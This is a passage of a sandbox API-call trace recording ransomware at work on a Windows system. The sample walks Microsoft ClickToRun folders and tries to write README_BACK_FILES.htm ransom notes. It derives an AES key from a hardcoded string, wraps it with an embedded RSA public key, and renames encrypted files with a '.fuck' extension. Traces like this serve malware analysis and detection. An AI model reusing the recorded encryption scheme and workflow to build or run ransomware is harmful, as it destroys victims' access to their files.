(lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml.fuck")) returned 0 [0234.970] CryptDestroyHash (hHash=0x27eba60) returned 1 [0234.970] CryptDestroyKey (hKey=0x27ebe60) returned 1 [0234.970] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0234.970] FindNextFileA (in: hFindFile=0x394be8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0234.970] FindClose (in: hFindFile=0x394be8 | out: hFindFile=0x394be8) returned 1 [0234.971] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\readme_back_files.htm")) returned 0xffffffff [0234.971] AreFileApisANSI () returned 1 [0234.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e3808, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 166 [0234.971] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.971] GetLastError () returned 0x5 [0234.971] GetLastError () returned 0x5 [0234.971] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0234.971] FindClose (in: hFindFile=0x394b28 | out: hFindFile=0x394b28) returned 1 [0234.971] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\readme_back_files.htm")) returned 0xffffffff [0234.971] AreFileApisANSI () returned 1 [0234.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2793100, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 127 [0234.971] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.972] GetLastError () returned 0x5 [0234.972] GetLastError () returned 0x5 [0234.972] FindNextFileA (in: hFindFile=0x27170a8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0234.972] FindClose (in: hFindFile=0x27170a8 | out: hFindFile=0x27170a8) returned 1 [0234.972] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\readme_back_files.htm")) returned 0xffffffff [0234.972] AreFileApisANSI () returned 1 [0234.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2dd388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0234.972] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.972] GetLastError () returned 0x5 [0234.972] GetLastError () returned 0x5 [0234.972] FindNextFileA (in: hFindFile=0x2716fa8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0234.972] FindClose (in: hFindFile=0x2716fa8 | out: hFindFile=0x2716fa8) returned 1 [0234.972] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\readme_back_files.htm")) returned 0xffffffff [0234.973] AreFileApisANSI () returned 1 [0234.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6fd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0234.973] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.973] GetLastError () returned 0x5 [0234.973] GetLastError () returned 0x5 [0234.973] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.973] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27ebc20 [0234.973] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.973] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.973] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x27ebfa0 [0234.973] FindNextFileA (in: hFindFile=0x27ebfa0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0234.973] FindNextFileA (in: hFindFile=0x27ebfa0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0234.973] FindClose (in: hFindFile=0x27ebfa0 | out: hFindFile=0x27ebfa0) returned 1 [0234.974] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\readme_back_files.htm")) returned 0xffffffff [0234.974] AreFileApisANSI () returned 1 [0234.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0234.974] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.974] GetLastError () returned 0x5 [0234.974] GetLastError () returned 0x5 [0234.975] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0234.975] FindClose (in: hFindFile=0x27ebc20 | out: hFindFile=0x27ebc20) returned 1 [0234.975] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\readme_back_files.htm")) returned 0xffffffff [0234.975] AreFileApisANSI () returned 1 [0234.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39da88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0234.975] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.975] GetLastError () returned 0x5 [0234.975] GetLastError () returned 0x5 [0234.975] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0234.975] FindClose (in: hFindFile=0x27175e8 | out: hFindFile=0x27175e8) returned 1 [0234.975] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\readme_back_files.htm")) returned 0xffffffff [0234.975] AreFileApisANSI () returned 1 [0234.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6e78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0234.975] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.976] GetLastError () returned 0x5 [0234.976] GetLastError () returned 0x5 [0234.976] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0234.976] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27ebce0 [0235.271] FindNextFileA (in: hFindFile=0x27ebce0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.271] FindNextFileA (in: hFindFile=0x27ebce0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.271] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27ebea0 [0235.272] FindNextFileA (in: hFindFile=0x27ebea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0235.272] FindNextFileA (in: hFindFile=0x27ebea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0235.273] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x27eb8a0 [0235.389] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.389] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.389] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.390] GetLastError () returned 0x5 [0235.390] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml")) returned 0x20 [0235.390] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x80) returned 0 [0235.391] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.391] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.391] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.392] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2793100) returned 1 [0235.406] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.406] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.406] CryptHashData (hHash=0x27ebb20, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.406] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x27ebb20, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27eb860) returned 1 [0235.406] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.406] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.406] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2791b38) returned 1 [0235.409] CryptImportPublicKeyInfo (in: hCryptProv=0x2791b38, dwCertEncodingType=0x1, pInfo=0x27974b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27974e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27974f0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebaa0) returned 1 [0235.409] CryptEncrypt (in: hKey=0x27ebaa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.409] CryptEncrypt (in: hKey=0x27ebaa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2791f78*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2791f78*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.409] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2791f78, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.409] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.409] CryptEncrypt (in: hKey=0x27eb860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.409] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.409] CloseHandle (hObject=0xffffffff) returned 1 [0235.409] CloseHandle (hObject=0xffffffff) returned 1 [0235.409] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml"), bFailIfExists=0) returned 0 [0235.410] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x0) returned 0 [0235.410] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml.gsg")) returned 0 [0235.410] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\MasterDescriptor.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\masterdescriptor.en-us.xml.fuck")) returned 0 [0235.411] CryptDestroyHash (hHash=0x27ebb20) returned 1 [0235.411] CryptDestroyKey (hKey=0x27eb860) returned 1 [0235.411] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0235.411] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.411] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.411] GetLastError () returned 0x5 [0235.411] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash")) returned 0x20 [0235.411] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash", dwFileAttributes=0x80) returned 0 [0235.412] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.412] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.412] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash.gsg", dwFileAttributes=0x2) returned 0 [0235.412] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2792550) returned 1 [0235.420] CryptCreateHash (in: hProv=0x2792550, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.420] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.420] CryptHashData (hHash=0x27ebd20, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.420] CryptDeriveKey (in: hProv=0x2792550, Algid=0x6610, hBaseData=0x27ebd20, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27ebc20) returned 1 [0235.420] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.420] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.420] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2792220) returned 1 [0235.422] CryptImportPublicKeyInfo (in: hCryptProv=0x2792220, dwCertEncodingType=0x1, pInfo=0x2796958*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796988*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796990*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebe20) returned 1 [0235.423] CryptEncrypt (in: hKey=0x27ebe20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.423] CryptEncrypt (in: hKey=0x27ebe20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792660*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2792660*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.423] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792660, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.423] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.423] CryptEncrypt (in: hKey=0x27ebc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.423] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.423] CloseHandle (hObject=0xffffffff) returned 1 [0235.423] CloseHandle (hObject=0xffffffff) returned 1 [0235.423] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash" (normalized: 